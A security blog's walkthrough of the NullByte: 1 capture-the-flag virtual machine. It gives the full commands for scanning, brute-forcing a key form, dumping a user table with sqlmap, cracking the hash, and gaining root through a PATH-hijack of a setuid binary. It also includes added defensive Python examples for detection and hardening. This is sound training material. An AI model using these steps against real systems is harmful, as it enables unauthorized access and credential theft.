NuHarbor Security Blog
May 31, 2018

NullByte: 1 Walkthrough

NuHarbor Security

It's that time again! Time to practice our penetration testing skills and tactics, that is. NullByte: 1 is another root-the-box type challenge that can be found on http://vulnhub.com. Like other challenges on the site, the goal is to read the flag hidden in the root directory of the server, but you have to exploit your way to the root first. For this walkthrough we'll be using a KALI 2.0 virtual machine as our attack host. Without further delay, let's dive into NullByte: 1!

Let's start by powering on the VM and doing a quick Nmap sweep to find the IP address that the box has been assigned. You'll recall from a previous blog (Application Security Testing Tutorial via Rooting Hackademics RTB1) that we'll be looking for a machine with a "Vmware" network card manufacturer. Yours may be different, depending on what software you're using to run the VM. We can also assume that this vulnerable machine will probably be running a webserver on port 80.

nmap -T4 -sV -p80 192.168.100.0/24

[Screenshot: NullByte1]

There we go! With an IP address it's time to check out what other services this box may be hosting. Running a more in-depth Nmap scan will give us that information.

nmap -T4 -A 192.168.100.131

[Screenshot: NullByte2]

Aside from RPC and SSH running on port 777, there's not much to go on here. Let's see what pages the webserver is serving by navigating to the IP address in a web browser.

[Screenshot: NullByte3]

With only a single static page, the next step is to run some directory brute-forcers and vulnerability scans against the web server. We decided to run both a Nikto scan and a Dirb scan to see what turns up.

nikto -host http://192.168.100.131

[Screenshot: NullByte4]

dirb http://192.168.100.131

[Screenshot: NullByte5]

Aside from a few directories and a unique header, there doesn't appear to be much that catches our attention. Let's save ourselves the time of manually checking each discovered page and move on to the image on the homepage. Perhaps a hint is hidden in the image, possibly in the form of steganography.

We can wget the image from the webserver and, as a rule of thumb, check the EXIF data before anything else.

wget http://192.168.100.131/main.gif

exiftool main.gif

[Screenshot: NullByte6]

It seems we've lucked out and discovered what appears to be some sort of cipher hidden in the comment section of the EXIF data.

Now, admittedly, we spent a fair amount of time playing with this string. We tried using it as an SSH password, brute forcing known ciphers against it to see if it was in fact an encoded value, and even using it as a phpmyadmin password. After many failed attempts, however, we made a desperate attempt to use it as a directory name on the web server. Lo and behold, it worked!

http://192.168.100.131/KzMb5nVYJw

[Screenshot: NullByte7]

It appears to be a page asking for a key where, if we inspect the page source, we can find a hint that suggests brute-forcing may be the way to go. At this point, we could write a script to brute force the key, but let's not reinvent the wheel. In an attempt to broaden our horizons, we decided to use a tool on KALI 2.0 called Patator.

patator http_fuzz url=http://192.168.100.131/KzMb5nVYJw/index.php method=POST body='key=FILE0' 0=~/wordlists/rockyou.txt follow=1 accept_cookies=1 -x ignore:fgrep='invalid key'

[Screenshot: NullByte8]
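The Patator run above works because the key form answers with a 200 and the text "invalid key" for every wrong guess, so nothing in the status codes distinguishes a brute force from normal use. The detector below, an added example that is not part of the original post, shows what a defender can do instead: parse combined-format web server access logs and flag any client that POSTs to the key form more than a threshold number of times inside a sliding window. The log lines are constructed, the form path is the one from this walkthrough, and the 60-second window and threshold of 20 are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format; we only need client, time, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The key form on this box, used as the brute-force target in the walkthrough.
KEY_FORM = "/kzMb5nVYJw/index.php"


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_bursts(lines, path=KEY_FORM, window=timedelta(seconds=60), threshold=20):
    """Return {client_ip: peak_count} for clients that POST to `path` more than
    `threshold` times inside any sliding window of length `window`.

    Status codes are deliberately ignored: the form returns 200 whether or not
    the key is right, so request rate, not status, is the usable signal."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of crashing the detector
        ip, ts, method, req_path, _status = rec
        if method == "POST" and req_path == path:
            posts[ip].append(ts)

    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


def build_sample_log():
    """Constructed sample log: one client hammering the key form once a second,
    one client browsing normally. Not real traffic from the box."""
    t0 = datetime(2018, 5, 31, 10, 0, 0, tzinfo=timezone.utc)

    def fmt(ts):
        return ts.strftime(TS_FMT)

    lines = []
    for i in range(40):
        lines.append(f'192.168.100.10 - - [{fmt(t0 + timedelta(seconds=i))}] '
                     f'"POST {KEY_FORM} HTTP/1.1" 200 498')
    lines.append(f'192.168.100.20 - - [{fmt(t0)}] "GET /kzMb5nVYJw/ HTTP/1.1" 200 512')
    lines.append(f'192.168.100.20 - - [{fmt(t0 + timedelta(seconds=15))}] '
                 f'"POST {KEY_FORM} HTTP/1.1" 200 498')
    lines.append(f'192.168.100.20 - - [{fmt(t0 + timedelta(seconds=90))}] '
                 f'"POST {KEY_FORM} HTTP/1.1" 200 1024')
    lines.append("garbage line that does not match the format")
    return lines


if __name__ == "__main__":
    for ip, count in find_bursts(build_sample_log()).items():
        print(f"{ip}: {count} POSTs to {KEY_FORM} within 60s")
```

Run against a real access log with `find_bursts(open("/var/log/apache2/access.log"))`; the same shape of rule (rate per client per form) is what a WAF or fail2ban jail would enforce, and rate limiting or lockout on the form itself removes the signal Patator depends on.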

In almost no time at all we have the proper key, "elite"! Inputting the key brings us to the following form:

[Screenshot: NullByte10]

Recalling that the hint from earlier said, "this form isn't connected to mysql," we jumped right into sqlmap.

sqlmap -u "http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test" --dbs

[Screenshot: NullByte9]

Bingo. Noticing the database named "seth," let's enumerate the tables and then the columns.

sqlmap -u "http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test" -D seth --tables

[Screenshot: NullByte11]

sqlmap -u "http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test" -D seth -T users --columns

[Screenshot: NullByte12]

We have a good feeling about this database. Let's dump the values.

sqlmap -u "http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test" -D seth -T users -C id,users,pass --dump

[Screenshot: NullByte13]
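What sqlmap exploited here is a search page that splices the usrtosearch parameter straight into its SQL. The example below is added for illustration and is not the box's 420search.php nor any code from the original post: it rebuilds the users table from the column names sqlmap reported (the rows are constructed placeholders), shows the concatenated query returning every row for a tautology input, and shows the same search with a bound parameter and an input allowlist returning nothing for that input. SQLite stands in for the MySQL backend; the point about parameterization is the same.

```python
import re
import sqlite3

# Classic probe: closes the string literal and ORs in an always-true clause.
TAUTOLOGY = "' OR '1'='1"


def make_db():
    """In-memory stand-in for the box's 'seth' database. Table and column names
    follow the sqlmap output above; the rows are constructed, not the box's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, users TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users (users, pass) VALUES (?, ?)",
        [("ramses", "<hash-placeholder-1>"), ("alice", "<hash-placeholder-2>")],
    )
    return conn


def search_vulnerable(conn, usrtosearch):
    """The flaw pattern: the request parameter becomes part of the SQL text,
    so quotes in it rewrite the WHERE clause."""
    sql = "SELECT id, users FROM users WHERE users LIKE '%" + usrtosearch + "%'"
    return conn.execute(sql).fetchall()


def is_valid_username(value):
    """Allowlist for the search term: defence in depth in front of the query."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", value) is not None


def search_safe(conn, usrtosearch):
    """Same search with a bound parameter: the input is always data, never SQL.
    Inputs outside the allowlist are rejected before the database sees them."""
    if not is_valid_username(usrtosearch):
        return []
    sql = "SELECT id, users FROM users WHERE users LIKE ?"
    return conn.execute(sql, ("%" + usrtosearch + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal  :", search_vulnerable(db, "ram"), search_safe(db, "ram"))
    print("injected:", search_vulnerable(db, TAUTOLOGY), search_safe(db, TAUTOLOGY))
```

With the tautology the vulnerable query becomes `... WHERE users LIKE '%' OR '1'='1%'`, which matches every row; the parameterized version treats the whole string as a LIKE pattern and matches nothing. Reviewing PHP for string-built queries (mysqli_query with interpolated variables) and replacing them with prepared statements closes the class of bug sqlmap found here.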

At first glance the pass for ramses looks like a hashed value, but we know a base64 string when we see one. Decoding the base64 value gives us the actual hash. Note that we append a "=" to the string so that base64 can decode it properly, since the dumped value is missing its padding.

echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d

[Screenshot: NullByte14]

With the actual MD5 hash we can use hashcat and the rockyou.txt wordlist to crack it:

echo "c6d6bd7ebf806f43c76acc3681703b81" > hash

hashcat -m 0 -a 0 hash ~/wordlists/rockyou.txt

[Screenshot: NullByte15]
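Two weaknesses made the last three commands work: base64 is an encoding, not protection, and an unsalted MD5 of a dictionary word falls to a wordlist in seconds. The following added example (not from the original post) handles the padding edge case the walkthrough hit by hand, classifies what a stored "password" value really is, and contrasts it with salted, iterated PBKDF2 storage. The base64 value and hash are the ones shown above; the classification labels and the round count are our own choices.

```python
import base64
import hashlib
import hmac
import os
import re

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def b64decode_lenient(value: str) -> bytes:
    """Decode base64 even when the trailing '=' padding was dropped in storage,
    which is what the walkthrough had to fix by hand. Raises ValueError
    (binascii.Error) if the text still is not valid base64."""
    value = value.strip()
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value, validate=True)


def classify_stored_secret(value: str) -> str:
    """Describe what a 'password' column value really is. Labels are our own."""
    if MD5_HEX.match(value):
        return "unsalted-md5"
    try:
        inner = b64decode_lenient(value).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return "unknown"
    if MD5_HEX.match(inner):
        return "base64(unsalted-md5)"  # one base64 -d away from a crackable hash
    return "base64(other)"


PBKDF2_ROUNDS = 600_000  # assumed default; tune to your hardware


def hash_password(password: str, rounds: int = PBKDF2_ROUNDS) -> str:
    """Salted, iterated hash. Every guess against a leaked value costs `rounds`
    HMAC evaluations, and the per-user salt means no shared rainbow table."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison against a value produced by hash_password()."""
    try:
        algo, rounds, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(rounds))
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    dumped = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"  # as dumped, padding missing
    print(b64decode_lenient(dumped).decode(), classify_stored_secret(dumped))
    stored = hash_password("example-password")
    print(stored, verify_password("example-password", stored))
```

Running the classifier over a dumped credentials table is a quick way to triage an incident: anything reported as unsalted MD5 (wrapped in base64 or not) should be treated as already cracked for any password that appears in a common wordlist.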

Now that we have the user ramses and the password omega, it's time to figure out what these credentials are for. Logging in to SSH with them proves successful. Remember from earlier that SSH is on port 777.

ssh ramses@192.168.100.131 -p 777

[Screenshot: NullByte16]

We now have a shell on the system and the final step is to escalate to root to read the flag in /root/. We can start by checking the .bash_history for any hints.

cat .bash_history

[Screenshot: NullByte17]

It appears that a previous user was running a binary called procwatch in /var/www/backup.

Let's check out this procwatch binary.

[Screenshot: NullByte18]

Notice that the file is owned by root and has the sticky bit permission set. This must be our ticket to gaining root privileges. We can grab this file and debug it with gdb-peda to see how it's working. However, after running it, we have a feeling it's using the "ps" command in some way.

[Screenshot: NullByte19]

[Screenshot: NullByte20]

Notice the sections highlighted in yellow above: the binary simply calls system() with the bare command name "ps" as its argument, so the shell resolves "ps" through $PATH. Knowing this, we should be able to exploit it easily by modifying the $PATH environment variable on the NullByte: 1 box. Let's create a symlink named ps that points to /bin/sh and put the current directory at the front of PATH.

cd /var/www/backup

ln -s /bin/sh ps

export PATH=.:$PATH

./procwatch

id

[Screenshot: NullByte21]

And there we have it, a root shell!
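The root shell comes from a root-owned binary with the setuid bit (the "s" in the owner execute position) that spawns a command by bare name, leaving PATH resolution to whoever runs it. The fix on the development side is an absolute path (/bin/ps) plus a sanitized environment before any system() or exec call; on the operations side, the audit below finds the same pattern on a host. It is an added example, not code from the original post or the box: it walks the given directories for setuid-root files, pulls printable strings the way strings(1) does, and reports binaries that both import a shell-spawning libc routine and reference a common utility by bare name. The utility list, the audit roots and the sample binary bytes are constructed.

```python
import os
import re
import stat

# Utilities a privileged helper is likely to shell out to. Constructed list; extend for your fleet.
COMMON_UTILS = {
    "ps", "ls", "cat", "sh", "bash", "id", "cp", "mv", "rm", "chmod", "chown",
    "mail", "tar", "gzip", "find", "grep", "awk", "sed", "kill", "netstat", "ifconfig", "ip",
}
# Libc entry points that hand a command string to /bin/sh or search PATH themselves.
SHELL_SPAWNERS = {"system", "popen", "execvp", "execlp", "execvpe"}


def extract_strings(data: bytes, min_len: int = 2):
    """Printable ASCII runs, like the strings(1) utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def bare_commands(strings):
    """Strings that invoke a known utility by bare name (PATH lookup), e.g. 'ps'
    or 'ps aux'; '/bin/ps' is absolute and is not flagged."""
    hits = []
    for s in strings:
        first = s.strip().split(" ")[0]
        if first in COMMON_UTILS:
            hits.append(s.strip())
    return hits


def uses_shell_spawn(strings):
    """True if the binary's symbol/string table names a shell-spawning routine."""
    return any(s in SHELL_SPAWNERS for s in strings)


def is_setuid_root(mode: int, uid: int) -> bool:
    """Regular file, setuid bit set, owned by root: runs as root for whoever executes it."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def audit_tree(roots):
    """Yield (path, bare_commands) for setuid-root files that both import a
    shell-spawning libc call and reference a utility by bare name."""
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                    if not is_setuid_root(st.st_mode, st.st_uid):
                        continue
                    with open(path, "rb") as fh:
                        strs = extract_strings(fh.read())
                except OSError:
                    continue  # unreadable or vanished; skip rather than abort the audit
                hits = bare_commands(strs)
                if hits and uses_shell_spawn(strs):
                    yield path, hits


# Constructed stand-in for a binary's data section: an ELF header fragment,
# the bare string "ps", and the usual dynamic-linking names.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
                 + b"ps\x00/lib64/ld-linux-x86-64.so.2\x00libc.so.6\x00system\x00")

if __name__ == "__main__":
    strs = extract_strings(SAMPLE_BINARY)
    print("bare commands:", bare_commands(strs), "spawns shell:", uses_shell_spawn(strs))
    for path, hits in audit_tree(["/usr/local/bin", "/var/www"]):  # assumed audit roots
        print(path, hits)
```

A finding from audit_tree() is a candidate, not proof: confirm it by reading the binary's disassembly as the walkthrough did with gdb-peda, and check whether it is a web-writable location such as /var/www, where an unprivileged user can plant the look-alike command.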

Last but not least, let's read the flag.

[Screenshot: NullByte22]
